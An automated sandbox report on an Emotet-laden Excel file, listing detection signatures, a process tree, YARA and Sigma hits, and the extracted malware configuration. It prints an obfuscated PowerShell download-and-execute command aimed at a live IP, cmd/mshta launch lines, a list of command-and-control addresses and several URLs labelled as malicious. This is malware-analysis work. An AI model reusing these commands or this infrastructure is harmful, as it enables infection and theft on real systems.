Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
80_513972285.xls

Overview

General Information

Sample Name:80_513972285.xls
Analysis ID:562424
MD5:c130bfd7e7632f18fcd505d0991f192f
SHA1:da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256:eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2824 cmdline: cmd /c mshta http://91.240.118.168/qqw/aas/se.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/qqw/aas/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 3012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2132 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 1524 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2544 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
80_513972285.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x108a2:$s1: Excel
  • 0x11913:$s1: Excel
  • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
80_513972285.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    80_513972285.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
    • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
    • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
    • 0x946:$x1: * #,##0
    • 0x952:$x1: * #,##0
    • 0x9fb:$x1: * #,##0
    • 0xa0a:$x1: * #,##0
    • 0xa36:$x1: * #,##0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\80_513972285.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x108a2:$s1: Excel
    • 0x11913:$s1: Excel
    • 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\80_513972285.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\Users\user\Desktop\80_513972285.xlsINDICATOR_OLE_Excel4Macros_DL2Detects OLE Excel 4 Macros documents acting as downloadersditekSHen
      • 0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00
      • 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00
      • 0x946:$x1: * #,##0
      • 0x952:$x1: * #,##0
      • 0x9fb:$x1: * #,##0
      • 0xa0a:$x1: * #,##0
      • 0xa36:$x1: * #,##0
      C:\ProgramData\QWER.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 69 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.rundll32.exe.330000.2.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    17.2.rundll32.exe.28f0000.12.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      15.2.rundll32.exe.2890000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        12.2.rundll32.exe.2810000.8.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          10.2.rundll32.exe.2280000.6.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 102 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2824, ProcessCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2840
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2648, ProcessCommandLine: cmd /c mshta http://91.240.118.168/qqw/aas/se.html, ProcessId: 2824
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.168/qqw/aas/se.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2840, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 3012

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://kuyporn.com/wp-content/XSAvira URL Cloud: Label: malware
                            Source: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlMuzLAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlWinSta0Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlfunctionAvira URL Cloud: Label: malware
                            Source: https://grupomartinsanchez.com/wAvira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlv1.0Avira URL Cloud: Label: malware
